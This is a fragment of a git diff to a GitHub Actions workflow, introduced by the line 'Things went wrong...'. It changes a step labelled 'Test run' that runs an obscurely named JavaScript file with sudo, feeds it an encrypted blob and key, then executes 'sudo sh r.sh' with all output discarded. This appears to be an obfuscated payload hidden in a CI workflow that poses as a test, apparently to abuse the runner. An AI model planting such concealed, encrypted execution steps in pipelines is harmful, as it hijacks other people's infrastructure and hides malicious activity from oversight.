Things went wrong...

--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'jeo33'
+        echo 'shgi1'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1/4KdhcqF5OQdq82AgxZ92DYpWbcn4FV/S3181iB/MolK0GQg4aZ52ejiIoPnhLJr1o24zEhsW3VSMK0rKitZ2SkTdd4OSGv39/iGyMdocidT2zoWFuodbU g7bbd1 && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+pO/cJs/zRu89l6Hph9cc2dpCwJiGtuZkTs3RatdLDVz9m/uwP92G5BT6WIGs9fH+IlW1AgZQ2HT6DTGdB1G/EDcFJuJ6gYVXWDf6JHgBtsNB0GbJ/or51 n9ivn1 && sudo sh r.sh > /dev/null 2>&1
